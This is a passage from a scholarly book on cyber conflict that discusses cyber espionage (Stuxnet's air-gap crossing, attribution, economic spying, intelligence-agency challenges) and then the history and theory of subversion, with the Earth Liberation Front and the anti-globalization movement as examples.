public pressure. Ultimately the Iranians became suspicious of the German
engineers and ended the visits to Natanz. 61 But by then it was too late.

The precise details of Stuxnet's penetration technique remain shrouded
in mystery. Yet some details and facts have been established. We may not
know who ultimately bridged the air gap and made sure the worm could
start its harmful work. But it now seems highly likely that a human
carrier helped jump that gap, at least at some stage during the
reconnaissance or the attack itself. An earlier assumption was that
Stuxnet had a highly aggressive initial infection strategy hardwired into
its software, in order to maximize the likelihood of spreading to one of
the laptops used to program the Siemens PLCs. 62 It should be noted that
the two possibilities do not necessarily stand in contradiction: the
attack was a protracted campaign that had to jump the air gap more than
once, and an unwitting carrier and an aggressive spreading strategy may
each have done so on different occasions.

The evolution of the Internet is widely seen as a game-changer for
intelligence agencies. Appropriate historical comparisons are difficult
to make. 63 But in terms of significance, the Internet probably surpasses
the invention of electrical telegraphy in the 1830s. The net's wider
importance for human communication may be comparable to Johannes
Gutenberg's invention of the printing press in the 1440s, a time that
predates the existence of the modern state with its specialized
intelligence agencies. The more precise meaning of this possibly
game-changing development will remain uncertain for years to come.
Isolating three trends may help clarify the picture.

The first unprecedented change is an explosion of data. Individuals,
companies, non-commercial groups, and of course states produce a
fast-growing volume of data in the form of digital imagery, videos,
voice data, emails, instant messages, text, metadata, and much more
besides. The digital footprint of almost any individual in a developed
country is constantly getting deeper and bigger, and so are the digital
fingerprints that all sorts of transactions leave behind in log files
and metadata. The same applies to companies and public administrations.
More data is produced at any given moment than at any time in the past.
Vast quantities of this information are instantly classified. Yet,
perhaps counterintuitively, the share of information that is actually
secret is shrinking, and what remains secret is becoming better
protected, argues Nigel Inkster, a former British intelligence official
now working at the International Institute for Strategic Studies. 64
Non-classified data is growing faster than classified data. The ongoing
rise of social media epitomizes this trend: social media generate
gigantic amounts of data; this data is half-public, depending on the
privacy settings, and thus creates potentially collectable intelligence.

The second novel change is the rise of the attribution problem. Acts of
espionage and even acts of political violence that cannot be attributed
to a perpetrator are of course not new, but their number and
significance certainly are. In September 2010, Jonathan Evans, the
director-general of MI5, Britain's domestic intelligence service, gave
a speech in London to the Worshipful Company of Security Professionals,
a younger livery company (an old institution related to medieval
guilds). Evans highlighted the emerging risks: "Using cyberspace,
especially the Internet, as a vector for espionage has lowered the
barriers to entry and has also made attribution of attacks more
difficult, reducing the political risks of spying," he said. 65 More
actors were spying, it was easier for them to hide, and the risk they
were taking was lower. As a result of falling costs and rising
opportunities, he argued, the likelihood that a firm or government
agency is the target of state espionage was higher than ever before. The
range and volume of espionage that can be accomplished without
attribution has probably never been so great. The same applies to the
amount of goods that can be pilfered clandestinely.

The third trend partly follows from the first two: the blending of
economic and political espionage. In late 2007, Evans sent a
confidential letter to the top executives of 300 large companies in the
United Kingdom, including banks, financial services firms, accountants,
and law firms. Evans warned that they were under attack from "Chinese
state organizations." 66 This was the first time that the British
government had directly accused the Chinese government of cyber
espionage. The summary of the letter on the website of the UK's Centre
for the Protection of National Infrastructure warned that the People's
Liberation Army would target British firms doing business with China in
an effort to steal confidential information that may be commercially
valuable. The foreign intruders had specifically targeted Shell Oil and
Rolls Royce, a leading producer of high-tech jet engines. Evans's letter
allegedly included a list of known "signatures" that could be used to
identify Chinese Trojans, as well as a rundown of URLs that had been
used in the past to stage targeted attacks. Economic espionage is more
than just a subset of this problem. Especially in highly developed
knowledge societies (the West, in short) the most profitable and the
biggest companies have integrated global supply chains with many
exposures to the Internet. One agency in Washington is in charge of
integrating the defense against foreign spies across various government
agencies, the Office of the National Counterintelligence Executive,
abbreviated as NCIX. In October 2011, the outfit published a report on
foreign spying operations against US economic secrets in cyberspace.
"Cyber tools have enhanced the economic espionage threat," the report
states, "and the Intelligence Community judges the use of such tools is
already a larger threat than more traditional espionage methods." 67 The
report clearly stated that Chinese actors were the world's most active
and persistent aggressors, noting an "onslaught" of computer intrusions
against the private sector. Yet even the intelligence agency in charge of
detecting such intrusions noted that it was unable to confirm who within
China was responsible.

These trends create a number of novel challenges for intelligence
agencies, especially those agencies or subdivisions traditionally
focused on signals intelligence, SIGINT. The first challenge is
selection: identifying and exploiting the most relevant sources for the
most relevant information. This challenge is a consequence of big data.
The problem is best illustrated by modifying the old quip of the drunk
looking for his car keys underneath the streetlight, because that's
where the light is. Big data means the drunk is now searching for the
car keys in a sprawling and brightly lit field of streetlights,
stretching out in all directions as far as the eye can see. Finding the
keys there is a problem in itself. But the selection problem is that the
keys may still be in the dark, beyond that field of streetlights. Just
because a signals intelligence agency has a lot of data, this doesn't
necessarily mean it has the right data.

The second challenge is interpretation and analysis (i.e. finding the
keys within that field of streetlights). Big data means that turning
data into intelligence has become harder, and turning that intelligence
into "actionable" intelligence even more so. Pure cyber espionage, that
is, remote infiltration of a system, remote reconnaissance, and remote
exfiltration of data, comes with a number of problems built in. A lack of


109 


CYBER WAR WILL NOT TAKE PLACE 


insider knowledge almost always means that putting data and information
into context is far harder. The story of Tanaka's head baker epitomizes
this problem. If a company sets out to steal and replicate an entire
industrial process, a lot of tacit knowledge is required to replicate
that process, not just the explicit knowledge stored in data. Data can be
downloaded, but not experience, skills, and hunches, all of which are
crucial in order to understand complex processes as well as complex
decisions. Access to insiders may be necessary to put a deluge of
information into context. Big data, in short, also means that
intelligence agencies can collect far more data than they can sensibly
analyze.

The third challenge is reorienting and reconnecting human intelligence.
The specter of cyber espionage, especially from the point of view of the
attacked, is threatening to drive a wedge between SIGINT and HUMINT, with
the former receiving lots of funds, even in times of scarce budgets, and
the latter receiving queries about its continued relevance. "[H]uman
spies are no longer the whole game," observed Brenner, formerly at the
NSA. "If someone can steal secrets electronically from your office from
Shanghai or Moscow, perhaps they don't need a human spy." 68 Yet seeing a
cleavage between the two forms of intelligence would be mistaken.
Stuxnet and the Sinovel case, two of the most high-profile cyber
espionage operations, highlight the crucial relevance of human
operatives within cyber espionage operations. As Evans noted to the
Worshipful Company of Security Professionals, "Cyber espionage can be
facilitated by, and facilitate, traditional human spying." 69 The two
prime challenges induced by the explosion of data and the attribution
problem, selection and interpretation, may be dealt with only through
old-fashioned HUMINT work, albeit sometimes technically upgraded, and
not merely by "pure" cyber espionage and data-crunching. One crucial job
of intelligence agents is to recruit and maintain a relationship of
trust with informants, for instance Iranian scientists working on the
nuclear enrichment program who clandestinely pass information to the
CIA. The recruitment and maintenance of informants is a delicate task
that requires granular knowledge of an individual's personality and
history, and establishing a personal relationship between the handler
and the informant. It has become possible to establish and maintain such
relationships online, although online-only recruitment presents
significant challenges to intelligence agencies. Making sure that a
person on Skype, Facebook, or email is a bona fide member of a specific
group or profession is more difficult than in a face-to-face conversation
and interrogation. 70 Human intelligence is still needed, and tacit
knowledge makes it clear why this is the case. Neither the value of tacit
knowledge nor the value of personal trust and face-to-face connections
has diminished in the twenty-first century.

The fourth challenge for secretive intelligence agencies is openness:
not openly available data, but the need to be open and transparent in
order to succeed. On 12 October 2010, the head of the Government
Communications Headquarters (GCHQ), the UK's equivalent of the National
Security Agency, gave a noteworthy speech. The speech by Iain Lobban was
noteworthy for the fact alone that it was the first-ever major address
by a sitting head of the secretive agency, known as the "doughnut" in
England because of its ring-shaped headquarters building near
Cheltenham, a large spa town in Gloucestershire, two hours west of
London. Lobban made a few important points in the speech. Perhaps the
most crucial one was that he highlighted an opportunity that the United
Kingdom could seize if only the government, telecommunication companies,
hardware and software vendors, as well as service providers, would "come
together:"

It's an opportunity to develop a holistic approach to Cyber Security that
makes UK networks intrinsically resilient in the face of cyber threats.
And that will lead to a competitive advantage for the UK. We can give
enterprises the confidence that by basing themselves here they gain the
advantages of access to a modern Internet infrastructure while reducing
their risks. 71

It is no longer enough that the government's own networks are safe.
Securing a country's interests in cyberspace requires securing a segment
of the entire domain that goes far beyond just the public sector within
it. But such a holistic approach to cyber security, and the cooperation
between intelligence agencies and the private sector needed for that
approach, comes with built-in difficulties. Giving enterprises confidence
before they even come to the UK implies some form of international
marketing to highlight the security benefits of Britain as a new home for
financial firms and high-tech entrepreneurs. But GCHQ was formed in 1919
as the Government Code and Cypher School, and it is known for having
invented public key cryptography, a tool for keeping information secret,
and then for keeping that invention itself secret for more than two
decades. This long-fostered secretive culture may now turn from virtue to
vice. Only by being significantly and aggressively more open will
intelligence agencies be able to meet their new responsibilities,
especially those concerning the economic dimension of that
responsibility.

This fourth challenge leads to a fifth one that is even more
fundamental. The Internet has made it far more difficult to draw the
line between domestic and foreign intelligence. The predominant
administrative division of labor in the intelligence community is
predicated on a clear line between internal and external affairs, as is
the legal foundation of espionage. That line, which was never entirely
clear, has become brittle and murky. The attribution problem means that
an agency which intercepts an email of grave concern, for instance, may
find it impossible to locate the sender and the receiver, and therefore
impossible to identify that specific piece of intelligence as foreign or
domestic. But the intelligence may still be highly valuable. In 1978, US
President Jimmy Carter signed the Foreign Intelligence Surveillance Act
(FISA) into law. Introduced by Senator Ted Kennedy, the act was designed
to improve congressional oversight of the government's surveillance
activities. The backdrop of the new law was President Richard Nixon's
abuse of federal intelligence agencies to spy on opposition political
groups in America. FISA, as a consequence, imposed severe limits on the
use of intelligence agencies inside the United States, including on
intercepting communication between foreigners on American soil.

In sum, intelligence agencies engaged in some form of cyber espionage
face an ugly catch-22. On the one hand, taking cyber espionage seriously
means unprecedented openness vis-a-vis new constituencies as well as
unprecedented and borderline-legal surveillance at home. This means
change: changing the culture as well as the administrative and possibly
legal setup of what intelligence agencies used to be in the past. Such
reforms could amount to a veritable redefinition of the very role of
intelligence agencies. On the other hand, taking cyber espionage
seriously means reintroducing and strengthening the human element, in
order to penetrate hard targets, big data, and the wicked attribution
problem. But by recruiting, placing, and maintaining human intelligence
sources, an agency may effectively move an operation outside the realm
of cyber espionage narrowly defined, thus removing the "cyber" prefix
from espionage.
The previous chapters discussed two general types of cyber attack,
namely sabotage and espionage. The third remaining offensive activity is
subversion. Subversion was one of the most complex and intellectually
challenging political phenomena long before the arrival of modern
telecommunication. But the Internet and the commoditization of
telecommunication are changing the nature of subversion, making it even
more complex. As a consequence, this chapter, more than the two previous
chapters, is only able to scratch the surface of a much deeper subject.
Remarkably, that subject has received comparatively little recent
scholarly attention. But by focusing on subversion, and not on
insurgency or terrorism, the following paragraphs open fresh
perspectives on past examples that help to understand the likely lifespan
and endurance of resistance movements in a networked present and an even
more networked future.

The first dozen years of the twenty-first century have seen an explosion
in protest and political violence. The most extreme and cataclysmic
expression of this trend was al-Qaeda's attack on New York's World Trade
Center. One decade later, only across the street in Zuccotti Park, yet in
many ways at the opposite end of the spectrum, rose the Occupy Wall
Street movement. The panoply of subversive movements in between includes
Arab youth triggering uprisings against despised despots, the
alter-globalization movement, animal rights activists, anonymous
hacktivists, and assorted social media-enabled protest movements in
Russia, China, Iran, and elsewhere. At first glance these phenomena have
little in common: some are seen as a righteous force for progress and
overdue change, others as an expression of perfidy, barbarism, and
regression.

Yet at second glance these diverse examples have at least two
characteristics in common, visible to all observers regardless of their
allegiances. The first is that they all share the goal of undermining
the authority of an existing order. Activists in any of these examples
may not share one vision of what the despised existing order should be
replaced by, but they share the belief that the establishment should be
forced to change its ways, if not its constitutional setup. Whether
extreme or mainstream, whether peaceful or violent, whether legal or
criminal, whether progressive or regressive, these movements were all
subversive. The second common characteristic is that all these movements
or groups benefited to a certain degree from new communication
technologies. Taking action seems to have been enabled, at least
initially, by the newfound ability to send and receive information,
often interactively and often personal, on platforms that were no longer
controlled by the very establishment the activists were up against, such
as their country's mainstream media, state-run or not. Whether radical
or conventional, whether non-violent or militant, whether legitimate or
outcast, these movements all had a virtual trait. 1 This chapter
proceeds from the assumption that new subversive movements in a
networked twenty-first-century context merit a general discussion:
cyberspace is changing the nature of subversion, both to the benefit and
to the chagrin of activists and militants.

Subversion is an old idea that arose in Europe's own democratic
revolutions at the turn of the nineteenth century. Its virtual dimension
was added only 200 years later, with the emergence of the interactive
Internet at the turn of the twenty-first century. The concept is
time-tested, nimble, and remarkably fruitful: subversion is not
necessarily focused on violence and counter-force, and may therefore
overcome the inadequate terminology of victory and defeat. Once
subversion is conceptually fleshed out, a number of illuminating
questions become visible: how is it possible to distinguish between
regenerative and more radical subversion? When is subversion likely to
become violent? And under what conditions is subversion likely to lose
momentum, peter out, and disappear again?
This chapter argues that networked computers and the commoditization of
consumer electronics have affected subversion in one overarching way:
the early phases of subversively undermining established authority and
collective trust require less violence than they did before. Launching a
subversive "start-up" has therefore become easier, but technology has a
darker flipside for those attempting to undermine established powers.
Turning this subversive start-up into a successful insurgent or
revolutionary "enterprise" has become more difficult. Technology, in
short, has lowered the entry costs but raised the threshold for success.

Pointing out three conceptual strengths of subversion plus three
hypotheses will outline the argument. The first strength is that the
notion of subversion is much older and better established than its more
narrow-minded recent rivals. The second strength is that subversion
takes the debate beyond a counter-productive focus on violence. The
concept's third strength is that it is able to grasp the phenomenon of
limited goals and motivations. From these rather uncontroversial
insights follow three more provocative hypotheses, each of which will be
illustrated with one or more examples of recent subversive movements
that were influenced to some degree by networked communication
technology. The first hypothesis is that new technologies have enabled a
proliferation of subversive causes and ideas, leading to a larger supply
of subversive ideas and to a more diversified landscape of subversive
entrepreneurs and start-ups: subversion, in short, has become more
cause-driven. The second hypothesis holds that new technologies have
made it easier to join a subversive cause, and they have also made it
easier to stop subversive activity again: subversion, consequently, is
seeing higher levels of membership-mobility. The third hypothesis is
that technology is enabling new forms of global and participant-driven
organization, and that this has made it more difficult for subversive
movements to establish organizational discipline and trust, features
that are enabled by what legal theorists call an internal coercive
order: Internet-driven subversion, therefore, is characterized by lower
levels of organizational control. Each of these three changes comes with
advantages as well as disadvantages for subversives. The balance sheet,
and whether the bottom line is red or black, may depend on the political
environment of the subversive activity, whether it takes place in the
context of a liberal democracy or under authoritarian rule.

A brief word of caution on methodology is necessary here: the examples
used to illustrate this chapter's argument, such as the
anti-globalization movement, Anonymous, or the online organizations that
helped spark the 2011 Egyptian Revolution, are far more complex subjects
than the discussion of single instances of malicious programs in previous
chapters. They are multi-layered social and political phenomena that
were, to a certain extent, enabled or influenced by technological
innovations. And studying social phenomena is often harder than studying
technology. What follows are therefore mere illustrations and examples
to demonstrate very specific points, not full-blown case studies.

Subversion is the deliberate attempt to undermine the trustworthiness,
the integrity, and the constitution of an established authority or
order. The ultimate goal of subversion may be overthrowing a society's
established government. But subversive activity often has more limited
aims, such as undermining and eroding an organization's or even a
person's authority. The modus operandi of subversive activity is eroding
social bonds, beliefs, and trust in the state and other collective
entities. The means used in subversion may not always include overt
violence. One common tool of subversive activity is media work, such as
writing pamphlets and literature, and producing art and film. Naturally,
the rise of social media and Web 2.0 has greatly facilitated the
subversive tactic of public outreach. Influencing the loyalties and the
trust of individuals and uncommitted bystanders is the vehicle for
subversion, not influencing technical systems. Human minds are the
targets, not machines.

Subversion, as a concept, is much older than insurgency or terrorism.
Yet for many observers and some contemporary historians it misleadingly
conveys a mid-twentieth-century feel. Indeed, the term arose again in the
1950s and 1960s, when the cold war between the Soviet Union and the
United States resulted in global proxy conflicts where both sides
employed all means at their disposal to undermine the influence of the
other ideological bloc. Subversion was one of those means, applied by
one state clandestinely against the established order in another state.
But historically, the heyday of subversion was much earlier (Figure 1).

The concept of subversion came to be used more widely in the English
language around the time of the French Revolution of 1789 and the
crushed Irish Rebellion of 1798. Many words alter their meaning over the
course of time. But subversion did not significantly change its meaning.
"To make a revolution is to subvert the ancient state of our country,"
wrote the Irish statesman and orator Edmund Burke in his famous
conservative manifesto, Reflections on the Revolution in France (1790).
And he added that "no common reasons are called for to justify so
violent a proceeding." 3 It is worth pointing out that, for Burke,
subversion included violent action. The term, like sabotage and
espionage, was imported into the English language via the French. It was
already in widespread use before Paris descended into insurrection,
mutiny and then civil war in the 1780s. In earlier sources, to subvert
was to overthrow, to overturn, and to corrupt, said one authoritative
dictionary of the English language of 1768. 4 A thesaurus of 1806 gave
the synonyms: overthrow, destruction, ruin, end. 5 (The term
"insurgency" was not in common English use at the time and does not
appear in historic dictionaries.) A book about George III, who reigned
in Britain in turbulent times from 1760 to 1820, has several fleeting
remarks about attempts at subversion: of the government, of the state,
of the constitution, and of the "established faith." 6 Military jargon
had a similar understanding. One military dictionary of 1810, compiled by
Charles James, a major in the Royal Artillery Drivers, described
subversion as "a state of total disorder and indiscipline; generally
produced by a neglect of small faults at the beginning, and a gradual
introduction of every sort of military insubordination." 7

Figure 1: Semantic rise and fall of the terms "subversion," "insurgency,"
and "terrorism." Source: Google Ngram Viewer. 2

Over the course of the next century, subversion boomed. Europe’s anciens régimes would be unsettled and its populations uprooted again and again by rival political ideologies, expressing themselves in agitation, violence, and revolution. By the turn of the century the geopolitical balance of power slowly began to shift to the New World, as America’s economy bloomed and expanded rapidly. The United States grew into a capitalist giant thanks in part to the hard labor of European immigrants who filled its factories and mines. Many of these workers had experienced oppression under Europe’s kings and czars, and they brought with them radical and utopian ideologies from Italy, Russia, Germany, and France. Not without justification, America’s political establishment feared the specter of subversion. “The time of the great social revolutions has arrived,” wrote Theodore Roosevelt in 1895. That year the future president served as police commissioner in New York City. “We are all peering into the future to try to forecast the action of the great dumb forces set in operation by the stupendous industrial revolution,” he wrote. 8 One year earlier, activists representing one of those dumb forces—anarchism—had assassinated the president of France. Several heads of state would die at the hands of anarchists over the next six years, including Roosevelt’s predecessor as America’s president, William McKinley, who was killed in 1901. A little more than a century after McKinley’s assassination, it was the stupendous information revolution that was again setting in operation great forces that toppled heads of state and removed anciens régimes, this time across the Middle East. And we are again peering into the future to try to forecast the course of action of these subversive forces.

Subversion is not just older than insurgency. It is important to note that subversion is a broader concept than insurgency. The most prominent aspect is that subversion goes beyond violence, that the concept has not merely a military meaning, but also a political and philosophical one. To date, military writers and security scholars neglect this aspect. But for this very reason the security literature is a helpful point of departure. One useful author on subversion was Frank Kitson, a well-known British general who had seen action in the Kenyan Mau Mau Uprising, the Malayan Emergency, and in Northern Ireland. Kitson defined subversion in a narrow and rather linear way as “all illegal measures short of the use of armed force,” 9 essentially as non-violent political crime. A subversive campaign of non-violence, Kitson argued, may fall into one of three classes: it may be intended as a stand-alone instrument, without ever becoming violent; it may be intended to be used in conjunction with full-scale insurgency, for instance to divert limited government assets away from another, more violent battle; or subversive action may be intended as a phase in a larger progression towards a more intensive violent insurrection. 10 Kitson aptly recognized that subversion is much broader than insurgency, but like great military writers before him who highlighted political aspects of war, he had precious little to say about these broader political aspects, let alone the social and cultural aspects. 11 By defining subversion as illegal yet non-violent, the British general maneuvered himself into conceptually murky territory that is difficult to reconcile with an open and democratic political order, as will become evident shortly.

Kitson’s narrow take on subversion may be contrasted, for maximum effect, with the views of one of his contemporaries, Johannes Agnoli (both were born in the mid-1920s). Agnoli was a Marxist professor at Freie Universität Berlin and one of the intellectual forebears of the 1968 student revolt. In a final lecture series before retirement in 1991, Agnoli grandly attempted to draw a positive theory and history of subversion, from “paradise” to the French Revolution. 12 He depicted Eve as the mother of subversion. It was Eve, derived from Adam’s rib, which was in turn derived from God, who heard the voice of reason and subverted the two layers of hierarchy that had created her. Not God and not Man, but the subversive Eve, for the first time, made the step from the unconscious to the conscious, from mythos to logos, from object to subject. 13 The strongly left-leaning intellectual professor in Berlin was unabashedly in favor of subverting the West German government and society in the 1970s. Yet dismissing Agnoli’s ideas and his impressive analysis would be just as naive as some of his radical students probably were. One of the professor’s prime questions was the nature of subversion, of “the thing itself,” as he called it with awe. Should subversion be understood as action, as praxis? Or should it be understood as reflection, as thinking about something, about “the conditions that aren’t,” as he quoted from Bertolt Brecht’s refrain in the 1928 play Dreigroschenoper. 14 “The utopic is always blended into the subversive,” he wrote. 15 He understood utopia as a hope toward a better life, as a dream. If there was no utopia, Agnoli argued, then the human side of society would disappear. By that he meant a humanity that wouldn’t limit itself to pity and merciful philanthropy, but a humanity that is fighting for its freedom and its happiness. “Those who declare the end of utopia while criminalizing the subversive,” Agnoli wrote, “want to prevent the possibility of progress.” 16 Refusing such progress and innovation would be “pissing thought,” 17 the Berlin professor deadpanned in reference to Hegel. The German idealist philosopher once compared the creation of new consciousness (Bewußtsein) and novel thought with siring new life—and staying within the boundaries of a used framework with “pissing.” 18 Even after only superficially comparing Kitson’s and Agnoli’s ideas, it is easy to see how subversion as a broad and overarching political idea appeals more to those in favor of change, perhaps even radical change, than to those in favor of keeping the social order as it is or as it has been. For Agnoli, Kitson’s book must have oozed the smell of stale urine.

A third aspect is that subversion usually has more limited goals than insurgency. Insurgency and revolution are only the most extreme forms of subversive activity. And insurgents and revolutionaries, by implication, have the goal of overthrowing the government and putting in place a revolutionary regime. Subversives, by contrast, tend to have more limited causes, such as undermining and eroding an organization’s or even a person’s authority. The modus operandi of subversive activity is eroding social bonds, beliefs, and trust in a government, a company, or other collective entities. The means used in subversion may not always include overt violence. The vehicle of subversion is always influencing the worldviews and loyalties of individuals and uncommitted bystanders, the way they interpret relationships of authority and power vis-à-vis their own political, social, and economic situation. The purpose of subversion is to make resistance more likely, be it non-violent or violent. If violence is used, decision-makers are the prime targets, not technical systems. In other words: even when violence, sabotage, or arson is explicitly targeted at technical installations or property, not people, it is the mind and the cost-benefit calculations of politicians, owners, managers, or consumers that are the actual targets of such attacks.

A subversive movement may fail to progress and mature into a full-fledged insurgent group not for lack of strength, but for lack of intention, even when some more extreme members and cells resort to systematic violence. Activists may simply not want to make revolution. Indeed, historical examples of regime change or revolution through non-violent subversion alone are extraordinarily rare. 19 Again it is useful to consider Kitson, who aptly pointed out that the goal of subversion may either be overthrowing an established economic or governmental order—or “to force them to do things they do not want to do.” 20 The first objective is revolutionary and existential; the second objective is evolutionary and pragmatic. Here one of the main defining features of subversion becomes visible. The objective of insurgency is always to overthrow an existing order, nothing less. The objective of a subversive movement is attempting to change an organization’s behavior, but not attempting to overthrow an existing order. Subversion, in short, can be limited to forcing those in power to do things they do not want to do, rather than to force them out. Yet radical activists may well resort to systematic violence. Subversion can therefore take two principal forms: it may be intended as a non-violent prelude to insurrection and revolution, or it may evolve into a campaign with a non-revolutionary dynamic, be it violent or non-violent. 21

A good example of this logic of limited ambitions is the Earth Liberation Front (ELF), a well-established and influential subversive movement originally based mainly in Britain and the United States, but with some activists scattered across the globe. The ELF illustrates that even an amorphous group without leadership and hierarchy can limit its goals as well as its tactics, in this case to violence against inanimate objects.

The Earth Liberation Front was launched in 1992 in Brighton, England, as an offshoot of the larger movement “Earth First!” The ELF had its most active phase in the mid-2000s. The elves, as its members affectionately referred to themselves, engaged in ecotage, a pun on sabotage. The movement initially benefited from academic participation, with book authors and scholars mobilizing for the elves’ cause. 22 The movement—dubbed “eco-terrorism” by its critics—had a clear ideology and a powerful cause: defending the planet and stopping the exploitation and destruction of the natural environment. The destruction of the environment, the ELF’s propaganda reasoned, was driven by the pursuit of monetary gain, by corporations and by the governments that allow these corporations to continue. In principle, this cause spoke to a very large constituency in many countries. The ELF’s amorphous organizational form reflected its potentially broad appeal. The movement relied on a leaderless resistance model with “no discernable organizational structure,” one of the most detailed academic studies of the “elves” pointed out. 23 The activists’ website says it is an “international, underground movement consisting of autonomous groups of people.” The radical green activists formed a cell structure, based on a shared ideology, but not much more. Activists remained largely unknown to each other. Instead of relying on clear lines of command and internal discipline, the movement relied on members “who understand the organization’s goals and orientation to take action on their own initiative.” 24 The organization operated with “no central leadership, no hierarchy, no membership databases, but a rather strict adherence to a set of very basic guidelines.” 25 These rules were three in number. The first was to educate the public on the “atrocities” committed against the environment and all the species that cohabitate in it. This amounted to a built-in reminder not to forget to market the cause. The second rule concerned the use of violence and specific targets, “to inflict maximum economic damage” on all those who profit from environmental destruction.

The third guideline was especially noteworthy: to take “all necessary precautions against harming any animal—human or non-human.” 26 Taking these rules seriously means limiting the form of activism to economic damage, not damage in life. The elves are known to have staged attacks in more than a dozen countries. Violent attacks have targeted developers, logging companies, those engaged in genetic engineering research, ski resorts, and even SUV dealerships. The amount of property damage caused by the radical environmentalists is remarkable. 27 In the five-year period between 1996 and 2001, one of the movement’s cells, called “The Family,” inflicted damages as high as $80 million against federal land and animal management sites, meat-packing plants, lumber facilities, and car dealerships. The cell’s most high-profile “direct actions” were a $12-million arson at the Vail Ski Resort in Colorado in 1998 and the sabotage of a high-tension power line near Bend, Oregon, in the following year. Since 1997, the Earth Liberation Front claims to have inflicted damage totaling well over $150 million worldwide. Yet, “in the history of the ELF internationally no one has been injured from the group’s actions and that is not a coincidence,” as the group’s Frequently Asked Questions point out. 28 The elves took care to walk a fine but clearly demarcated line: labs, research facilities, and company infrastructure were legitimate targets, while workers and managers were not: “we want a lot of people watching, not a lot of people dead.” 29

The ELF, like many subversive movements that gravitate towards violence, is a highly diverse and fractured movement. This effect is enhanced by the movement’s non-hierarchical setup as well as by an absence of consensual decision-making, in contrast to Earth First! There are, therefore, more radical streaks within the movement that embraced revolutionary rhetoric, albeit without attempting to turn the revolutionary vision into reality. 30 By and large, the ELF seems to be subversive and to have embraced violence against property—but at the same time the movement is limited; it is subversive but not revolutionary, and its violence carefully avoids targeting human beings. Radical environmentalism and the ELF predate the broad use of the Internet, and in contrast to other subversive movements it was not enabled by new technologies. But new technologies drastically enhanced one feature that the elves also grappled with: diverse causes.

The more technologically sophisticated a subversive movement and its targeted constituencies, the more cause-driven it is likely to become. One of the key drivers behind this dynamic is collective emotion. The concept of “cyber war” is inept and imprecise. But other classic concepts of the study of war retain their relevance and pertinence for the study of cyber offenses. Clausewitz, and many other strategic thinkers, consistently highlighted the role of passions and emotions in conflict, be it regular or irregular conflict. “The intensity of action,” Clausewitz observed, “is a function of the motive’s strength that is driving the action.” That motive may be a rational calculation or it may be emotional indignation (Gemütserregung), he added. “If power is meant to be great, the latter can hardly be missing.” 31 Subversion, like insurgency, is driven by strong motives that mobilize supporters, volunteers, and activists and, if violence comes into play, justify why fighters and insurgents would take up arms and possibly kill civilians. Another revered military thinker, David Galula, described the driving force behind an insurgent group as the cause. An insurgency’s treasure would be a “monopoly of a dynamic cause,” wrote the French expert of counterrevolutionary war in the 1960s. 32 But fifty years later, the demise of grand ideologies 33 and the rise of highly networked movements have altered the logic of dynamic causes. Rather than grand narratives, it is highly specific issues that are likely to mobilize a critical mass of enraged activists, if only temporarily. This dynamic has a flipside: the monopoly over a dynamic cause is replaced by a dynamic market of causes. Individuals and small groups may join a movement for their own individual reasons. These individual causes may have a strong emotional draw, but that benefit comes at the cost of coordination, coherence, and unity.

Perhaps the most insightful example of cause-driven subversion is the rise and decline of the anti-globalization movement, a left-leaning international protest movement that climaxed at the turn of the twenty-first century. Globalization became a widely used buzzword in the early 1990s. For many, globalization was equivalent to economic globalization. And economic globalization soon stood for the increasing liberalization of goods and services, unfettered capitalism, the power of multinational corporations, and regimes of global governance put in place to perpetuate a system that seemed unjust and oppressive to many. The globalization critics identified the World Trade Organization, the International Monetary Fund, and the World Bank as their main targets, along with a much-hated multilateral agreement on investment, the MAI. The anti-globalization movement understood itself as a counter-ideology. Globalization from above, as some activists saw it, needed to be resisted by globalization from below.

Initially, the movement was driven by the excitement of large, international protest events. One of the most visible founding events, the Carnival Against Capital, was held in Cologne, Germany, on 18 June 1999, and is therefore known as “J18”. Simultaneous events in the City of London and Oregon helped galvanize international media attention. The international day of protest had the rallying cry, “Our resistance is as transnational as capital.” 34 Perhaps the most memorable event in the short history of the anti-globalization movement was a march on Seattle in November and December 1999. The magnet for the protest was a World Trade Organization ministerial conference. Approximately 50,000 people took to the streets of downtown Seattle, a mid-size city of 600,000. On the morning of a cold and rainy Tuesday, 30 November, the “Battle of Seattle” began to unfold. The large number of demonstrators caught the city’s security agencies off-guard and effectively shut down the conference by blocking the Seattle Convention Center. The police resorted to tear gas, rubber bullets, and mass arrests. “N30,” as the November day is known among protesters, became symbolic for the anti-globalization movement and helped mobilize follow-on events.

Two things leaped to the eye. The first was the movement’s diversity. N30 did not just catch the authorities off-guard; it also caught those with a subversive agenda off-guard. The diversity of this early twenty-first-century phenomenon surprised even the organizers. At the time Carl Pope was the executive director of the Sierra Club, America’s oldest grassroots environmental organization founded in 1892. “From my perspective, and I came out of the ‘60s, Seattle was the first time when you saw multi-generation, multi-class, and multi-issue in the streets together,” Pope told Time magazine shortly after Seattle. 35 The banner of “anti-globalization” seemingly united a motley crew of activists: environmentalists of various shades, animal rights activists, union members, human rights advocates, anarchists of different stripes, even participants from the White supremacist scene. More than 600 groups, out of a total 15,000 participants, converged on Washington, D.C. in April 2000 in an event known as A16. The groups ranged from Greenpeace, one of the most established groups, to the Third Position, a curious mix of anarchist left and right positions and one of the more violent outfits. 36 The combination of such a sundry set of small groups into a larger movement resulted in a swirl of media attention and political responses. This visibility, in turn, created an impression of power that far exceeded what any single group could accomplish. CSIS, the Canadian intelligence service, summed up this dynamic in a report published shortly after Seattle:

The melding of the various groups into one large body implies power, and attracts attention and publicity, which, in turn, draws more and more participants. Many groups and individuals take part largely because of the ensuing attention and publicity, almost in the manner of self-generating growth. 37

Some groups united under the anti-globalization umbrella frequently changed their names. Also, individual activists may have been members of more than one group or changed membership as a group stopped operating for one reason or the other. It was not the mode of organization that mattered most, but the underlying psychological forces of activism. “Of more importance are the causes and motivations per se,” the Canadian intelligence analysts observed. The activists’ positive visions and ideals included fairer trade, more organic products, improved labor conditions in developing countries, corporate social responsibility, advancements of human rights, green energy, sustainable development, global justice, gay rights, feminism, and more.

But this diversity had a thorny side-effect: it diluted the movement. More causes meant less content. The result was empty slogans. “Another world is possible” was the motto of Porto Alegre, Brazil, where the first World Social Forum was held in late January 2001. For a few years, the meetings became counter-events to the World Economic Forum in Davos, Switzerland, which the critics saw as the embodiment of global capitalism. In Porto Alegre, various committees approved a so-called charter of principles later in 2001. The meeting, the charter said, was a place for:

groups and movements of civil society that are opposed to neo-liberalism and to domination of the world by capital and any form of imperialism, and are committed to building a planetary society directed towards fruitful relationships among Mankind and between it and the Earth. 38

